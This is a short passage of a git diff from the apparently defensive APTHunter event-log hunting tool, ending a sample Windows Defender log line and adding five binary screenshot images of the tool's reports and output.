+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
diff --git a/source/screenshot/APTHunter-Allreport.png b/source/screenshot/APTHunter-Allreport.png
new file mode 100644
index 0000000..225ecf5
Binary files /dev/null and b/source/screenshot/APTHunter-Allreport.png differ
diff --git a/source/screenshot/APTHunter-Excel.png b/source/screenshot/APTHunter-Excel.png
new file mode 100644
index 0000000..4db713f
Binary files /dev/null and b/source/screenshot/APTHunter-Excel.png differ
diff --git a/source/screenshot/APTHunter-Help.png b/source/screenshot/APTHunter-Help.png
new file mode 100644
index 0000000..c5a495b
Binary files /dev/null and b/source/screenshot/APTHunter-Help.png differ
diff --git a/source/screenshot/APTHunter-Timeline-Explorer.png b/source/screenshot/APTHunter-Timeline-Explorer.png
new file mode 100644
index 0000000..85b7d8f
Binary files /dev/null and b/source/screenshot/APTHunter-Timeline-Explorer.png differ
diff --git a/source/screenshot/APTHunter-output.png b/source/screenshot/APTHunter-output.png
new file mode 100644
index 0000000..2ce4dd0
Binary files /dev/null and b/source/screenshot/APTHunter-output.png differ